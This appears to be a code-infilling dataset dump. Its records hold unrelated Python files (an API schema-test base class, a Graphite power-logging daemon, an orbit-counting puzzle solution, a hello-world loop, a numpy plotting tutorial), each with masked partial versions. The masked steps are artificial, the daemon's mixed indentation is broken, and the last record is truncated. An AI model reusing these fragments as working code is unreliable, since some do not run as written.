"Base class for tests."
import argparse
import http.client
import json
import os
import re
import sys
import unittest
import jsonschema
import requests
SCHEMA_LINK_RX = re.compile(r'<([^>])+>; rel="([^"]+)')
JSON_MIMETYPE = 'application/json'
DEFAULT_SETTINGS = {
'ROOT_URL': 'http://127.0.0.1:5002/api',
'USERNAME': None, # Needs to be set! Must have admin privileges.
'APIKEY': None # Needs to be set! For the above user.
}
# The actual settings to use.
SETTINGS = {}
def process_args(filepath=None):
"""Process command-line arguments for this test suite.
Reset the settings and read the given settings file.
Return the unused arguments.
"""
if filepath is None:
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--settings', dest='settings',
metavar='FILE', default='settings.json',
help='Settings file')
parser.add_argument('unittest_args', nargs='*')
options, args = parser.parse_known_args()
filepath = options.settings
args = [sys.argv[0]] + args
else:
args = sys.argv
SETTINGS.update(DEFAULT_SETTINGS)
with open(filepath) as infile:
SETTINGS.update(json.load(infile))
assert SETTINGS['USERNAME']
assert SETTINGS['APIKEY']
return args
def run():
unittest.main(argv=process_args())
class Base(unittest.TestCase):
"Base class for Symbasis test cases."
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"Return the API root data."
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
def POST(self, url, json=None):
return self.session.post(url, json=json)
def PUT(self, url):
return self.session.put(url)
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"Validate the JSON instance versus the given JSON schema."
jsonschema.validate(instance=instance,
schema=schema,
format_checker=jsonschema.draft7_format_checker)
|
normal
|
{
"blob_id": "c455de70a79f70f5f0e21391511f5035f1b4feb9",
"index": 646,
"step-1": "<mask token>\n\n\nclass Base(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n self.schemas = {}\n self.session = requests.Session()\n self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})\n self.addCleanup(self.close_session)\n\n def close_session(self):\n self.session.close()\n\n @property\n def root(self):\n \"\"\"Return the API root data.\"\"\"\n try:\n return self._root\n except AttributeError:\n response = self.GET(SETTINGS['ROOT_URL'])\n self.assertEqual(response.status_code, http.client.OK)\n self._root = self.check_schema(response)\n return self._root\n\n def GET(self, url):\n return self.session.get(url)\n <mask token>\n <mask token>\n\n def DELETE(self, url):\n return self.session.delete(url)\n\n def check_schema(self, response):\n \"\"\"Check that the response JSON data matches the schema\n linked to in the response header.\n Return the response JSON.\n \"\"\"\n self.assertEqual(response.status_code, http.client.OK)\n result = response.json()\n url = response.links['schema']['url']\n try:\n schema = self.schemas[url]\n except KeyError:\n r = self.GET(url)\n self.assertEqual(r.status_code, http.client.OK)\n schema = r.json()\n self.schemas[url] = schema\n self.validate_schema(result, schema)\n return result\n\n def validate_schema(self, instance, schema):\n \"\"\"Validate the JSON instance versus the given JSON schema.\"\"\"\n jsonschema.validate(instance=instance, schema=schema,\n format_checker=jsonschema.draft7_format_checker)\n",
"step-2": "<mask token>\n\n\ndef process_args(filepath=None):\n \"\"\"Process command-line arguments for this test suite.\n Reset the settings and read the given settings file.\n Return the unused arguments.\n \"\"\"\n if filepath is None:\n parser = argparse.ArgumentParser()\n parser.add_argument('-S', '--settings', dest='settings', metavar=\n 'FILE', default='settings.json', help='Settings file')\n parser.add_argument('unittest_args', nargs='*')\n options, args = parser.parse_known_args()\n filepath = options.settings\n args = [sys.argv[0]] + args\n else:\n args = sys.argv\n SETTINGS.update(DEFAULT_SETTINGS)\n with open(filepath) as infile:\n SETTINGS.update(json.load(infile))\n assert SETTINGS['USERNAME']\n assert SETTINGS['APIKEY']\n return args\n\n\n<mask token>\n\n\nclass Base(unittest.TestCase):\n \"\"\"Base class for Symbasis test cases.\"\"\"\n\n def setUp(self):\n self.schemas = {}\n self.session = requests.Session()\n self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})\n self.addCleanup(self.close_session)\n\n def close_session(self):\n self.session.close()\n\n @property\n def root(self):\n \"\"\"Return the API root data.\"\"\"\n try:\n return self._root\n except AttributeError:\n response = self.GET(SETTINGS['ROOT_URL'])\n self.assertEqual(response.status_code, http.client.OK)\n self._root = self.check_schema(response)\n return self._root\n\n def GET(self, url):\n return self.session.get(url)\n\n def POST(self, url, json=None):\n return self.session.post(url, json=json)\n\n def PUT(self, url):\n return self.session.put(url)\n\n def DELETE(self, url):\n return self.session.delete(url)\n\n def check_schema(self, response):\n \"\"\"Check that the response JSON data matches the schema\n linked to in the response header.\n Return the response JSON.\n \"\"\"\n self.assertEqual(response.status_code, http.client.OK)\n result = response.json()\n url = response.links['schema']['url']\n try:\n schema = self.schemas[url]\n except KeyError:\n r = self.GET(url)\n self.assertEqual(r.status_code, http.client.OK)\n schema = r.json()\n self.schemas[url] = schema\n self.validate_schema(result, schema)\n return result\n\n def validate_schema(self, instance, schema):\n \"\"\"Validate the JSON instance versus the given JSON schema.\"\"\"\n jsonschema.validate(instance=instance, schema=schema,\n format_checker=jsonschema.draft7_format_checker)\n",
"step-3": "<mask token>\n\n\ndef process_args(filepath=None):\n \"\"\"Process command-line arguments for this test suite.\n Reset the settings and read the given settings file.\n Return the unused arguments.\n \"\"\"\n if filepath is None:\n parser = argparse.ArgumentParser()\n parser.add_argument('-S', '--settings', dest='settings', metavar=\n 'FILE', default='settings.json', help='Settings file')\n parser.add_argument('unittest_args', nargs='*')\n options, args = parser.parse_known_args()\n filepath = options.settings\n args = [sys.argv[0]] + args\n else:\n args = sys.argv\n SETTINGS.update(DEFAULT_SETTINGS)\n with open(filepath) as infile:\n SETTINGS.update(json.load(infile))\n assert SETTINGS['USERNAME']\n assert SETTINGS['APIKEY']\n return args\n\n\ndef run():\n unittest.main(argv=process_args())\n\n\nclass Base(unittest.TestCase):\n \"\"\"Base class for Symbasis test cases.\"\"\"\n\n def setUp(self):\n self.schemas = {}\n self.session = requests.Session()\n self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})\n self.addCleanup(self.close_session)\n\n def close_session(self):\n self.session.close()\n\n @property\n def root(self):\n \"\"\"Return the API root data.\"\"\"\n try:\n return self._root\n except AttributeError:\n response = self.GET(SETTINGS['ROOT_URL'])\n self.assertEqual(response.status_code, http.client.OK)\n self._root = self.check_schema(response)\n return self._root\n\n def GET(self, url):\n return self.session.get(url)\n\n def POST(self, url, json=None):\n return self.session.post(url, json=json)\n\n def PUT(self, url):\n return self.session.put(url)\n\n def DELETE(self, url):\n return self.session.delete(url)\n\n def check_schema(self, response):\n \"\"\"Check that the response JSON data matches the schema\n linked to in the response header.\n Return the response JSON.\n \"\"\"\n self.assertEqual(response.status_code, http.client.OK)\n result = response.json()\n url = response.links['schema']['url']\n try:\n schema = self.schemas[url]\n except KeyError:\n r = self.GET(url)\n self.assertEqual(r.status_code, http.client.OK)\n schema = r.json()\n self.schemas[url] = schema\n self.validate_schema(result, schema)\n return result\n\n def validate_schema(self, instance, schema):\n \"\"\"Validate the JSON instance versus the given JSON schema.\"\"\"\n jsonschema.validate(instance=instance, schema=schema,\n format_checker=jsonschema.draft7_format_checker)\n",
"step-4": "<mask token>\nSCHEMA_LINK_RX = re.compile('<([^>])+>; rel=\"([^\"]+)')\nJSON_MIMETYPE = 'application/json'\nDEFAULT_SETTINGS = {'ROOT_URL': 'http://127.0.0.1:5002/api', 'USERNAME':\n None, 'APIKEY': None}\nSETTINGS = {}\n\n\ndef process_args(filepath=None):\n \"\"\"Process command-line arguments for this test suite.\n Reset the settings and read the given settings file.\n Return the unused arguments.\n \"\"\"\n if filepath is None:\n parser = argparse.ArgumentParser()\n parser.add_argument('-S', '--settings', dest='settings', metavar=\n 'FILE', default='settings.json', help='Settings file')\n parser.add_argument('unittest_args', nargs='*')\n options, args = parser.parse_known_args()\n filepath = options.settings\n args = [sys.argv[0]] + args\n else:\n args = sys.argv\n SETTINGS.update(DEFAULT_SETTINGS)\n with open(filepath) as infile:\n SETTINGS.update(json.load(infile))\n assert SETTINGS['USERNAME']\n assert SETTINGS['APIKEY']\n return args\n\n\ndef run():\n unittest.main(argv=process_args())\n\n\nclass Base(unittest.TestCase):\n \"\"\"Base class for Symbasis test cases.\"\"\"\n\n def setUp(self):\n self.schemas = {}\n self.session = requests.Session()\n self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})\n self.addCleanup(self.close_session)\n\n def close_session(self):\n self.session.close()\n\n @property\n def root(self):\n \"\"\"Return the API root data.\"\"\"\n try:\n return self._root\n except AttributeError:\n response = self.GET(SETTINGS['ROOT_URL'])\n self.assertEqual(response.status_code, http.client.OK)\n self._root = self.check_schema(response)\n return self._root\n\n def GET(self, url):\n return self.session.get(url)\n\n def POST(self, url, json=None):\n return self.session.post(url, json=json)\n\n def PUT(self, url):\n return self.session.put(url)\n\n def DELETE(self, url):\n return self.session.delete(url)\n\n def check_schema(self, response):\n \"\"\"Check that the response JSON data matches the schema\n linked to in the response header.\n Return the response JSON.\n \"\"\"\n self.assertEqual(response.status_code, http.client.OK)\n result = response.json()\n url = response.links['schema']['url']\n try:\n schema = self.schemas[url]\n except KeyError:\n r = self.GET(url)\n self.assertEqual(r.status_code, http.client.OK)\n schema = r.json()\n self.schemas[url] = schema\n self.validate_schema(result, schema)\n return result\n\n def validate_schema(self, instance, schema):\n \"\"\"Validate the JSON instance versus the given JSON schema.\"\"\"\n jsonschema.validate(instance=instance, schema=schema,\n format_checker=jsonschema.draft7_format_checker)\n",
"step-5": "\"Base class for tests.\"\n\nimport argparse\nimport http.client\nimport json\nimport os\nimport re\nimport sys\nimport unittest\n\nimport jsonschema\nimport requests\n\nSCHEMA_LINK_RX = re.compile(r'<([^>])+>; rel=\"([^\"]+)')\n\nJSON_MIMETYPE = 'application/json'\n\nDEFAULT_SETTINGS = {\n 'ROOT_URL': 'http://127.0.0.1:5002/api',\n 'USERNAME': None, # Needs to be set! Must have admin privileges.\n 'APIKEY': None # Needs to be set! For the above user.\n}\n\n# The actual settings to use.\nSETTINGS = {}\n\ndef process_args(filepath=None):\n \"\"\"Process command-line arguments for this test suite.\n Reset the settings and read the given settings file.\n Return the unused arguments.\n \"\"\"\n if filepath is None:\n parser = argparse.ArgumentParser()\n parser.add_argument('-S', '--settings', dest='settings',\n metavar='FILE', default='settings.json',\n help='Settings file')\n parser.add_argument('unittest_args', nargs='*')\n options, args = parser.parse_known_args()\n filepath = options.settings\n args = [sys.argv[0]] + args\n else:\n args = sys.argv\n SETTINGS.update(DEFAULT_SETTINGS)\n with open(filepath) as infile:\n SETTINGS.update(json.load(infile))\n assert SETTINGS['USERNAME']\n assert SETTINGS['APIKEY']\n return args\n\ndef run():\n unittest.main(argv=process_args())\n\n\nclass Base(unittest.TestCase):\n \"Base class for Symbasis test cases.\"\n\n def setUp(self):\n self.schemas = {}\n self.session = requests.Session()\n self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})\n self.addCleanup(self.close_session)\n\n def close_session(self):\n self.session.close()\n\n @property\n def root(self):\n \"Return the API root data.\"\n try:\n return self._root\n except AttributeError:\n response = self.GET(SETTINGS['ROOT_URL'])\n self.assertEqual(response.status_code, http.client.OK)\n self._root = self.check_schema(response)\n return self._root\n\n def GET(self, url):\n return self.session.get(url)\n\n def POST(self, url, json=None):\n return self.session.post(url, json=json)\n\n def PUT(self, url):\n return self.session.put(url)\n\n def DELETE(self, url):\n return self.session.delete(url)\n\n def check_schema(self, response):\n \"\"\"Check that the response JSON data matches the schema\n linked to in the response header.\n Return the response JSON.\n \"\"\"\n self.assertEqual(response.status_code, http.client.OK)\n result = response.json()\n url = response.links['schema']['url']\n try:\n schema = self.schemas[url]\n except KeyError:\n r = self.GET(url)\n self.assertEqual(r.status_code, http.client.OK)\n schema = r.json()\n self.schemas[url] = schema\n self.validate_schema(result, schema)\n return result\n\n def validate_schema(self, instance, schema):\n \"Validate the JSON instance versus the given JSON schema.\"\n jsonschema.validate(instance=instance,\n schema=schema,\n format_checker=jsonschema.draft7_format_checker)\n",
"step-ids": [
8,
12,
13,
14,
16
]
}
|
[
8,
12,
13,
14,
16
] |
#!/usr/bin/python
import time
from daemon import runner
import graphitesend
from pywatts import get_data
class App():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/currentcost_daemon.pid'
self.pidfile_timeout = 5
def run(self):
while True:
graphitesend.init(graphite_server='localhost', system_name='', group='power', prefix='house')
try:
watts, temperature = get_data()
graphitesend.send_dict({'temperature':temperature, 'usage':watts})
time.sleep(5)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
time.sleep(5)
app = App()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
|
normal
|
{
"blob_id": "1aa49bc9a3ea12dffff907d17bd40b4425f28e13",
"index": 9829,
"step-1": "#!/usr/bin/python\nimport time\nfrom daemon import runner\nimport graphitesend\nfrom pywatts import get_data\n\nclass App():\n\tdef __init__(self):\n\t\tself.stdin_path = '/dev/null'\n\t\tself.stdout_path = '/dev/tty'\n\t\tself.stderr_path = '/dev/tty'\n\t\tself.pidfile_path = '/tmp/currentcost_daemon.pid'\n\t\tself.pidfile_timeout = 5\n\n\n def run(self):\n while True:\n graphitesend.init(graphite_server='localhost', system_name='', group='power', prefix='house') \n try:\n watts, temperature = get_data()\n graphitesend.send_dict({'temperature':temperature, 'usage':watts})\n time.sleep(5)\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n pass\n \n time.sleep(5)\n \n \napp = App()\ndaemon_runner = runner.DaemonRunner(app)\ndaemon_runner.do_action()\n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import sys
import json
with open(__file__.replace('.py', '.txt')) as f:
problem = f.read()
data = {
'problem': problem,
'example': """COM)B
B)C
C)D
D)E
E)F
B)G
G)H
D)I
E)J
J)K
K)L""" # should give 42
}
def solve_problem(input):
parents = {}
for i, line in enumerate(input.split('\n')):
about, object = line.split(')')
parents[object] = about
orbit_counts = {'COM': 0}
for object in tuple(parents.keys()):
stack = [object]
while stack[-1] not in orbit_counts:
stack.append(parents[stack[-1]])
known = orbit_counts[stack.pop()]
stack.reverse()
for thing in stack:
orbit_counts[thing] = orbit_counts[parents[thing]] + 1
return sum(orbit_counts.values())
# part 1
if sys.argv[-1] in data.keys():
scenarios = (sys.argv[-1],)
else:
scenarios = tuple(data.keys())
for scenario in scenarios:
input = data[scenario]
r = solve_problem(input)
print(f'FINAL ANSWER: {r}')
# 932, too low
print('')
print('**** PART 2 ******')
def get_parents(key, parents):
"""Get parents for a particular key through parents dict"""
r = [key]
while True:
this_one = r[-1]
if this_one == 'COM':
return r
r.append(parents[this_one])
def part2(input):
parents = {}
for i, line in enumerate(input.split('\n')):
about, object = line.split(')')
parents[object] = about
santa = get_parents('SAN', parents)
me = get_parents('YOU', parents)
for i, planet in enumerate(me):
if planet in santa:
print(f'met at {planet}')
print('')
print(santa[:santa.index(planet) + 1])
print(len(santa[:santa.index(planet) + 1]))
# minus one because we want traversials between elements in list
print(santa.index(planet))
print('')
print(me[:i + 1])
print(len(me[:i + 1]))
# minus one because we want traversials between elements in list
print(i)
# minus another one because transfering to the planet is already counted
# ...or something like that
# minus one because problem said so
return i + santa.index(planet) - 1
data['example'] = """COM)B
B)C
C)D
D)E
E)F
B)G
G)H
D)I
E)J
J)K
K)L
K)YOU
I)SAN"""
for scenario in scenarios:
input = data[scenario]
r = part2(input)
print(f'Part 2 answer {r}')
# 432, too high
# 433, too high
# 431, too high
# 430, correct
|
normal
|
{
"blob_id": "e57680c9bd09866e68ade0cfea7ce83cd6d50f58",
"index": 1596,
"step-1": "<mask token>\n\n\ndef solve_problem(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n orbit_counts = {'COM': 0}\n for object in tuple(parents.keys()):\n stack = [object]\n while stack[-1] not in orbit_counts:\n stack.append(parents[stack[-1]])\n known = orbit_counts[stack.pop()]\n stack.reverse()\n for thing in stack:\n orbit_counts[thing] = orbit_counts[parents[thing]] + 1\n return sum(orbit_counts.values())\n\n\n<mask token>\n\n\ndef get_parents(key, parents):\n \"\"\"Get parents for a particular key through parents dict\"\"\"\n r = [key]\n while True:\n this_one = r[-1]\n if this_one == 'COM':\n return r\n r.append(parents[this_one])\n\n\ndef part2(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n santa = get_parents('SAN', parents)\n me = get_parents('YOU', parents)\n for i, planet in enumerate(me):\n if planet in santa:\n print(f'met at {planet}')\n print('')\n print(santa[:santa.index(planet) + 1])\n print(len(santa[:santa.index(planet) + 1]))\n print(santa.index(planet))\n print('')\n print(me[:i + 1])\n print(len(me[:i + 1]))\n print(i)\n return i + santa.index(planet) - 1\n\n\n<mask token>\n",
"step-2": "<mask token>\nwith open(__file__.replace('.py', '.txt')) as f:\n problem = f.read()\n<mask token>\n\n\ndef solve_problem(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n orbit_counts = {'COM': 0}\n for object in tuple(parents.keys()):\n stack = [object]\n while stack[-1] not in orbit_counts:\n stack.append(parents[stack[-1]])\n known = orbit_counts[stack.pop()]\n stack.reverse()\n for thing in stack:\n orbit_counts[thing] = orbit_counts[parents[thing]] + 1\n return sum(orbit_counts.values())\n\n\nif sys.argv[-1] in data.keys():\n scenarios = sys.argv[-1],\nelse:\n scenarios = tuple(data.keys())\nfor scenario in scenarios:\n input = data[scenario]\n r = solve_problem(input)\n print(f'FINAL ANSWER: {r}')\nprint('')\nprint('**** PART 2 ******')\n\n\ndef get_parents(key, parents):\n \"\"\"Get parents for a particular key through parents dict\"\"\"\n r = [key]\n while True:\n this_one = r[-1]\n if this_one == 'COM':\n return r\n r.append(parents[this_one])\n\n\ndef part2(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n santa = get_parents('SAN', parents)\n me = get_parents('YOU', parents)\n for i, planet in enumerate(me):\n if planet in santa:\n print(f'met at {planet}')\n print('')\n print(santa[:santa.index(planet) + 1])\n print(len(santa[:santa.index(planet) + 1]))\n print(santa.index(planet))\n print('')\n print(me[:i + 1])\n print(len(me[:i + 1]))\n print(i)\n return i + santa.index(planet) - 1\n\n\n<mask token>\nfor scenario in scenarios:\n input = data[scenario]\n r = part2(input)\n print(f'Part 2 answer {r}')\n",
"step-3": "<mask token>\nwith open(__file__.replace('.py', '.txt')) as f:\n problem = f.read()\ndata = {'problem': problem, 'example':\n \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\"\"\"}\n\n\ndef solve_problem(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n orbit_counts = {'COM': 0}\n for object in tuple(parents.keys()):\n stack = [object]\n while stack[-1] not in orbit_counts:\n stack.append(parents[stack[-1]])\n known = orbit_counts[stack.pop()]\n stack.reverse()\n for thing in stack:\n orbit_counts[thing] = orbit_counts[parents[thing]] + 1\n return sum(orbit_counts.values())\n\n\nif sys.argv[-1] in data.keys():\n scenarios = sys.argv[-1],\nelse:\n scenarios = tuple(data.keys())\nfor scenario in scenarios:\n input = data[scenario]\n r = solve_problem(input)\n print(f'FINAL ANSWER: {r}')\nprint('')\nprint('**** PART 2 ******')\n\n\ndef get_parents(key, parents):\n \"\"\"Get parents for a particular key through parents dict\"\"\"\n r = [key]\n while True:\n this_one = r[-1]\n if this_one == 'COM':\n return r\n r.append(parents[this_one])\n\n\ndef part2(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n santa = get_parents('SAN', parents)\n me = get_parents('YOU', parents)\n for i, planet in enumerate(me):\n if planet in santa:\n print(f'met at {planet}')\n print('')\n print(santa[:santa.index(planet) + 1])\n print(len(santa[:santa.index(planet) + 1]))\n print(santa.index(planet))\n print('')\n print(me[:i + 1])\n print(len(me[:i + 1]))\n print(i)\n return i + santa.index(planet) - 1\n\n\ndata['example'] = \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\nK)YOU\nI)SAN\"\"\"\nfor scenario in scenarios:\n input = data[scenario]\n r = part2(input)\n print(f'Part 2 answer {r}')\n",
"step-4": "import sys\nimport json\nwith open(__file__.replace('.py', '.txt')) as f:\n problem = f.read()\ndata = {'problem': problem, 'example':\n \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\"\"\"}\n\n\ndef solve_problem(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n orbit_counts = {'COM': 0}\n for object in tuple(parents.keys()):\n stack = [object]\n while stack[-1] not in orbit_counts:\n stack.append(parents[stack[-1]])\n known = orbit_counts[stack.pop()]\n stack.reverse()\n for thing in stack:\n orbit_counts[thing] = orbit_counts[parents[thing]] + 1\n return sum(orbit_counts.values())\n\n\nif sys.argv[-1] in data.keys():\n scenarios = sys.argv[-1],\nelse:\n scenarios = tuple(data.keys())\nfor scenario in scenarios:\n input = data[scenario]\n r = solve_problem(input)\n print(f'FINAL ANSWER: {r}')\nprint('')\nprint('**** PART 2 ******')\n\n\ndef get_parents(key, parents):\n \"\"\"Get parents for a particular key through parents dict\"\"\"\n r = [key]\n while True:\n this_one = r[-1]\n if this_one == 'COM':\n return r\n r.append(parents[this_one])\n\n\ndef part2(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n santa = get_parents('SAN', parents)\n me = get_parents('YOU', parents)\n for i, planet in enumerate(me):\n if planet in santa:\n print(f'met at {planet}')\n print('')\n print(santa[:santa.index(planet) + 1])\n print(len(santa[:santa.index(planet) + 1]))\n print(santa.index(planet))\n print('')\n print(me[:i + 1])\n print(len(me[:i + 1]))\n print(i)\n return i + santa.index(planet) - 1\n\n\ndata['example'] = \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\nK)YOU\nI)SAN\"\"\"\nfor scenario in scenarios:\n input = data[scenario]\n r = part2(input)\n print(f'Part 2 answer {r}')\n",
"step-5": "import sys\nimport json\n\n\nwith open(__file__.replace('.py', '.txt')) as f:\n problem = f.read()\n\n\ndata = {\n 'problem': problem,\n 'example': \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\"\"\" # should give 42\n}\n\n\ndef solve_problem(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n\n orbit_counts = {'COM': 0}\n\n for object in tuple(parents.keys()):\n stack = [object]\n while stack[-1] not in orbit_counts:\n stack.append(parents[stack[-1]])\n known = orbit_counts[stack.pop()]\n stack.reverse()\n for thing in stack:\n orbit_counts[thing] = orbit_counts[parents[thing]] + 1\n\n return sum(orbit_counts.values())\n\n\n# part 1\nif sys.argv[-1] in data.keys():\n scenarios = (sys.argv[-1],)\nelse:\n scenarios = tuple(data.keys())\n\n\nfor scenario in scenarios:\n input = data[scenario]\n r = solve_problem(input)\n print(f'FINAL ANSWER: {r}')\n\n\n# 932, too low\n\nprint('')\nprint('**** PART 2 ******')\n\n\ndef get_parents(key, parents):\n \"\"\"Get parents for a particular key through parents dict\"\"\"\n r = [key]\n while True:\n this_one = r[-1]\n if this_one == 'COM':\n return r\n r.append(parents[this_one])\n\n\ndef part2(input):\n parents = {}\n for i, line in enumerate(input.split('\\n')):\n about, object = line.split(')')\n parents[object] = about\n\n santa = get_parents('SAN', parents)\n me = get_parents('YOU', parents)\n\n for i, planet in enumerate(me):\n if planet in santa:\n print(f'met at {planet}')\n print('')\n print(santa[:santa.index(planet) + 1])\n print(len(santa[:santa.index(planet) + 1]))\n # minus one because we want traversials between elements in list\n print(santa.index(planet))\n print('')\n print(me[:i + 1])\n print(len(me[:i + 1]))\n # minus one because we want traversials between elements in list\n print(i)\n # minus another one because transfering to the planet is already counted\n # ...or something like that\n # minus one because problem said so\n return i + santa.index(planet) - 1\n\ndata['example'] = \"\"\"COM)B\nB)C\nC)D\nD)E\nE)F\nB)G\nG)H\nD)I\nE)J\nJ)K\nK)L\nK)YOU\nI)SAN\"\"\"\n\nfor scenario in scenarios:\n input = data[scenario]\n r = part2(input)\n print(f'Part 2 answer {r}')\n\n# 432, too high\n# 433, too high\n# 431, too high\n# 430, correct\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
def Hello_worlder(x):
a = []
for i in range(x):
a.append('Hello world')
for i in a:
print(i)
Hello_worlder(10)
|
normal
|
{
"blob_id": "4f116f3eec9198a56a047ab42ed8e018ebb794bb",
"index": 3528,
"step-1": "<mask token>\n",
"step-2": "def Hello_worlder(x):\n a = []\n for i in range(x):\n a.append('Hello world')\n for i in a:\n print(i)\n\n\n<mask token>\n",
"step-3": "def Hello_worlder(x):\n a = []\n for i in range(x):\n a.append('Hello world')\n for i in a:\n print(i)\n\n\nHello_worlder(10)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.image import imread
X = np.array([[51, 55], [14, 19], [0, 4]])
print(X)
A = np.array([[1, 2], [3, 4]])
B = np.array([10, 20])
print(A * B)
print(X[0])
print(X[0][1])
for row in X:
print(row)
newX = X.flatten()
print(newX)
print(X > 15)
# 데이터 준비
x = np.arange(0, 6, 0.1) # 0에서 6까지 0.1 간격으로 생
y = np.sin(x)
# 그래프 그리기
plt.plot(x, y)
plt.show()
# 데이터 준비
y1 = np.sin(x)
y2 = np.cos(x)
# 그래프 그리기
plt.plot(x, y1, label="sin")
plt.plot(x, y2, linestyle="--", label="cos") # cos 함수는 점선으로 그리기
plt.xlabel("x") # x축 이름
plt.ylabel("y") # y축 이름
plt.title('sin & cos') # 제목
plt.legend()
plt.show()
# 이미지 그리기
img = imread('/Users/jiwon/Downloads/R800x0.png') #이미지 읽어오기
plt.imshow(img)
plt.show()
|
normal
|
{
"blob_id": "ba702a9c5d9d31e48b047c106d77cf1707031d70",
"index": 1795,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(X)\n<mask token>\nprint(A * B)\nprint(X[0])\nprint(X[0][1])\nfor row in X:\n print(row)\n<mask token>\nprint(newX)\nprint(X > 15)\n<mask token>\nplt.plot(x, y)\nplt.show()\n<mask token>\nplt.plot(x, y1, label='sin')\nplt.plot(x, y2, linestyle='--', label='cos')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('sin & cos')\nplt.legend()\nplt.show()\n<mask token>\nplt.imshow(img)\nplt.show()\n",
"step-3": "<mask token>\nX = np.array([[51, 55], [14, 19], [0, 4]])\nprint(X)\nA = np.array([[1, 2], [3, 4]])\nB = np.array([10, 20])\nprint(A * B)\nprint(X[0])\nprint(X[0][1])\nfor row in X:\n print(row)\nnewX = X.flatten()\nprint(newX)\nprint(X > 15)\nx = np.arange(0, 6, 0.1)\ny = np.sin(x)\nplt.plot(x, y)\nplt.show()\ny1 = np.sin(x)\ny2 = np.cos(x)\nplt.plot(x, y1, label='sin')\nplt.plot(x, y2, linestyle='--', label='cos')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('sin & cos')\nplt.legend()\nplt.show()\nimg = imread('/Users/jiwon/Downloads/R800x0.png')\nplt.imshow(img)\nplt.show()\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\nX = np.array([[51, 55], [14, 19], [0, 4]])\nprint(X)\nA = np.array([[1, 2], [3, 4]])\nB = np.array([10, 20])\nprint(A * B)\nprint(X[0])\nprint(X[0][1])\nfor row in X:\n print(row)\nnewX = X.flatten()\nprint(newX)\nprint(X > 15)\nx = np.arange(0, 6, 0.1)\ny = np.sin(x)\nplt.plot(x, y)\nplt.show()\ny1 = np.sin(x)\ny2 = np.cos(x)\nplt.plot(x, y1, label='sin')\nplt.plot(x, y2, linestyle='--', label='cos')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('sin & cos')\nplt.legend()\nplt.show()\nimg = imread('/Users/jiwon/Downloads/R800x0.png')\nplt.imshow(img)\nplt.show()\n",
